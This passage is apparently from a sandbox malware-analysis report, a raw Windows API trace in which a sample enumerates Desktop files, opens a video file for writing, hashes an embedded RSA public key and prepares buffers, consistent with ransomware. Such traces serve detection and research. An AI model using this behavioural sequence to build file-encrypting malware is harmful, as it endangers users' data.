dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0097.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0097.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0097.563] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.563] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.563] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0097.563] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.563] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.563] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.563] PathFindFileNameW (pszPath="") returned="" [0097.564] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8926dae0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x8926dae0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.564] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.564] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8926dae0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x8926dae0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.564] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x464a6c50, ftCreationTime.dwHighDateTime=0x1d5b602, ftLastAccessTime.dwLowDateTime=0xd87bcdf0, ftLastAccessTime.dwHighDateTime=0x1d5b8a3, ftLastWriteTime.dwLowDateTime=0xd87bcdf0, ftLastWriteTime.dwHighDateTime=0x1d5b8a3, nFileSizeHigh=0x0, nFileSizeLow=0xd6e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0UuOGgFHrUTR7ZhF.mkv", cAlternateFileName="0UUOGG~1.MKV")) returned 1 [0097.564] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0UuOGgFHrUTR7ZhF.mkv") returned=".mkv" [0097.564] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0UuOGgFHrUTR7ZhF.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0uuoggfhrutr7zhf.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.564] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=55008) returned 1 [0097.564] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.567] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd6ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.567] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.568] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.568] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xd6e0, lpOverlapped=0x0) returned 1 [0097.569] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.569] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.569] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.569] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693400) returned 1 [0097.570] CryptCreateHash (in: hProv=0x693400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.570] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.570] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.570] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.570] GetLastError () returned 0x0 [0097.571] SetLastError (dwErrCode=0x0) [0097.571] GetLastError () returned 0x0 [0097.571] SetLastError (dwErrCode=0x0) [0097.571] GetLastError () returned 0x0 [0097.571] SetLastError (dwErrCode=0x0) [0097.571] GetLastError () returned 0x0 [0097.571] SetLastError (dwErrCode=0x0) [0097.571] GetLastError () returned 0x0 [0097.571] SetLastError (dwErrCode=0x0) [0097.571] GetLastError () returned 0x0 [0097.571] SetLastError (dwErrCode=0x0) [0097.571] GetLastError () returned 0x0 [0097.571] SetLastError (dwErrCode=0x0) [0097.571] GetLastError () returned 0x0 [0097.571] SetLastError (dwErrCode=0x0) [0097.571] GetLastError () returned 0x0 [0097.571] SetLastError (dwErrCode=0x0) [0097.571] GetLastError () returned 0x0 [0097.571] SetLastError (dwErrCode=0x0) [0097.571] GetLastError () returned 0x0 [0097.571] SetLastError (dwErrCode=0x0) [0097.572] GetLastError () returned 0x0 [0097.572] SetLastError (dwErrCode=0x0) [0097.572] GetLastError () returned 0x0 [0097.572] SetLastError (dwErrCode=0x0) [0097.572] GetLastError () returned 0x0 [0097.572] SetLastError (dwErrCode=0x0) [0097.572] GetLastError () returned 0x0 [0097.572] SetLastError (dwErrCode=0x0) [0097.572] GetLastError () returned 0x0 [0097.572] SetLastError (dwErrCode=0x0) [0097.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.572] GetLastError () returned 0x0 [0097.572] SetLastError (dwErrCode=0x0) [0097.572] GetLastError () returned 0x0 [0097.572] SetLastError (dwErrCode=0x0) [0097.572] GetLastError () returned 0x0 [0097.572] SetLastError (dwErrCode=0x0) [0097.572] GetLastError () returned 0x0 [0097.572] SetLastError (dwErrCode=0x0) [0097.572] GetLastError () returned 0x0 [0097.572] SetLastError (dwErrCode=0x0) [0097.572] GetLastError () returned 0x0 [0097.573] SetLastError (dwErrCode=0x0) [0097.573] GetLastError () returned 0x0 [0097.573] SetLastError (dwErrCode=0x0) [0097.573] GetLastError () returned 0x0 [0097.573] SetLastError (dwErrCode=0x0) [0097.573] GetLastError () returned 0x0 [0097.573] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.573] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0097.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.573] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.573] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.573] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd6e0) returned 0x9ba4d90 [0097.574] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0097.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fb58 [0097.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a580 [0097.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fcc0 [0097.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a550 [0097.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5c8 [0097.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a490 [0097.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.574] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0097.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5c8 | out: hHeap=0x630000) returned 1 [0097.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a490 | out: hHeap=0x630000) returned 1 [0097.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0097.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a490 [0097.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0097.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a5c8 [0097.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0097.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0097.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0097.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0097.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a490 | out: hHeap=0x630000) returned 1 [0097.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5c8 | out: hHeap=0x630000) returned 1 [0097.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0097.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.575] GetCurrentThreadId () returned 0x42c [0097.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x695b58 [0097.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.576] GetCurrentThreadId () returned 0x42c [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5c8 [0097.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0097.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a490 [0097.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a598 [0097.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a610 [0097.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0097.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0097.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0097.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0097.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5c8 | out: hHeap=0x630000) returned 1 [0097.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5c8 [0097.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0097.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0097.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0097.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0097.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0097.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0097.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5c8 | out: hHeap=0x630000) returned 1 [0097.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0097.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0097.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0097.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0097.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0097.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0097.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a610 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a490 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a598 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a550 | 